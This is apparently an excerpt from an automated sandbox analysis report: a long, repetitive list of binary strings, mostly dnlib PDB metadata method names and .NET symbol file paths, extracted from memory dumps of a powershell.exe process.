Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.1732143246.000001B9E0134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1730333035.000001B9DFE4B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbes(x source: powershell.exe, 00000008.00000002.1733091752.000001B9E0196000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1730333035.000001B9DFF13000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1742752814.00007FFB4ACD0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb5 source: powershell.exe, 00000008.00000002.1730333035.000001B9DFF13000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000008.00000002.1733091752.000001B9E0196000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000008.00000002.1732143246.000001B9E00F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb1 source: powershell.exe, 00000008.00000002.1733091752.000001B9E0196000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1742752814.00007FFB4ACD0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
